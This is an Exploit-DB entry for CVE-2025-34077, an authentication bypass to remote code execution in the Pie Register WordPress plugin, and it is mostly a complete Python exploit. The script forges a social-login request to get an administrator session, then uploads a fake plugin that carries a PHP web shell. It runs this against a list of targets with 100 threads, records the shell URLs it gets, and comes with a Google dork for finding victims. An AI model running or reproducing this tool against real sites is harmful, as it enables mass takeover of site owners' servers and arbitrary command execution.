Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE

EDB-ID:

52370

CVE:

2025-34077

EDB Verified:

Author:

Md Amanat Ullah (xSwads)

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-07-22

Vulnerable App: 
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link:
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077

#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)

SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"
SHELL_FILE = "shell.php"
OUTPUT_FILE = "Shells.txt"
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10
lock = Lock()

def FilterURLS(site):
    site = site.strip()
    if not site.startswith(('http://', 'https://')):
        site = 'http://' + site
    if not site.endswith('/'):
        site += '/'
    return site

def make_shell_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
        z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
    buf.seek(0)
    return buf

def exploit(target):
    target = FilterURLS(target)
    session = requests.Session()
    data = {"social_site": "true", "user_id_social_site": "1"}
    try:
        r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if not session.cookies:
        print(f"{Fore.RED}[Failed] - {target}")
        return
    files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
    try:
        upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if "Plugin installed successfully" in upload.text:
        shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
        print(f"{Fore.GREEN}[Exploited] - {shell_url}")
        with lock:
            with open(OUTPUT_FILE, "a") as f:
                f.write(shell_url + "\n")
    else:
        print(f"{Fore.RED}[Failed] - {target}")

def main(targets_file):
    with open(targets_file, "r") as f:
        targets = [line.strip() for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = [executor.submit(exploit, target) for target in targets]
        for _ in as_completed(futures):
            pass

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} list.txt")
        sys.exit(1)

    main(sys.argv[1])
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services